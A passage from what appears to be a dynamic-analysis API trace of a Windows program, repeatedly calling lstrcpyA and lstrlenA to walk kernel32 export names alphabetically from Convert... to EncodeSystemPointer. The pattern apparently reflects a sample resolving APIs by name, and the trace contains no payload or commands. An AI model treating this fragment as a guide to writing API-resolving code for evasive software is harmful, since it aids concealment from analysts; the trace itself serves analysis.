lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0182.246] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0182.246] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0182.247] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0182.247] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0182.247] lstrlenA (lpString="COPYCONTEXT") returned 11 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0182.247] lstrlenA (lpString="COPYFILEA") returned 9 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0182.247] lstrlenA (lpString="COPYFILEEXA") returned 11 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0182.247] lstrlenA (lpString="COPYFILEEXW") returned 11 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0182.247] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0182.247] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0182.247] lstrlenA (lpString="COPYFILEW") returned 9 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0182.247] lstrlenA (lpString="COPYLZFILE") returned 10 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0182.247] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0182.247] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0182.247] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0182.247] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0182.247] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0182.247] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0182.247] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0182.247] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0182.248] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0182.248] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0182.248] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0182.248] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0182.248] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0182.248] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0182.248] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0182.248] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0182.248] lstrlenA (lpString="CREATEEVENTA") returned 12 [0182.248] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0182.248] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0182.249] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0182.249] lstrlenA (lpString="CREATEEVENTW") returned 12 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0182.249] lstrlenA (lpString="CREATEFIBER") returned 11 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0182.249] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0182.249] lstrlenA (lpString="CREATEFILEA") returned 11 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0182.249] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0182.249] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0182.249] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0182.249] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0182.249] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0182.249] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0182.249] lstrlenA (lpString="CREATEFILEW") returned 11 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0182.249] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0182.249] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0182.249] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0182.249] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0182.249] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0182.249] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0182.250] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0182.250] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0182.250] lstrlenA (lpString="CREATEJOBSET") returned 12 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0182.250] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0182.250] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0182.250] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0182.250] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0182.250] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0182.250] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0182.250] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0182.250] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0182.250] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0182.250] lstrlenA (lpString="CREATEPIPE") returned 10 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0182.250] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0182.250] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0182.250] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0182.250] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0182.250] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0182.251] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0182.251] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0182.251] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0182.251] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0182.251] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0182.251] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0182.251] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0182.251] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0182.251] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0182.251] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0182.251] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0182.251] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0182.251] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0182.251] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0182.251] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0182.251] lstrlenA (lpString="CREATETHREAD") returned 12 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0182.251] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0182.251] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0182.252] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0182.252] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0182.252] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0182.252] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0182.252] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0182.252] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0182.252] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0182.252] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0182.252] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0182.252] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0182.252] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0182.252] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0182.252] lstrlenA (lpString="CTRLROUTINE") returned 11 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0182.252] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0182.252] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0182.252] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0182.252] lstrlenA (lpString="DEBUGBREAK") returned 10 [0182.252] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0182.252] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0182.253] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0182.253] lstrlenA (lpString="DECODEPOINTER") returned 13 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0182.253] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0182.253] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0182.253] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0182.253] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0182.253] lstrlenA (lpString="DELETEATOM") returned 10 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0182.253] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0182.253] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0182.253] lstrlenA (lpString="DELETEFIBER") returned 11 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0182.253] lstrlenA (lpString="DELETEFILEA") returned 11 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0182.253] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0182.253] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0182.253] lstrlenA (lpString="DELETEFILEW") returned 11 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0182.253] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0182.253] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0182.253] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0182.253] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0182.254] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0182.254] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0182.254] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0182.254] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0182.255] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0182.255] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0182.255] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0182.255] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0182.255] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0182.255] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0182.255] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0182.255] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0182.256] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0182.256] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0182.256] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0182.256] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0182.256] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0182.256] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0182.256] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0182.256] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0182.256] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0182.256] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0182.256] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0182.256] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0182.256] 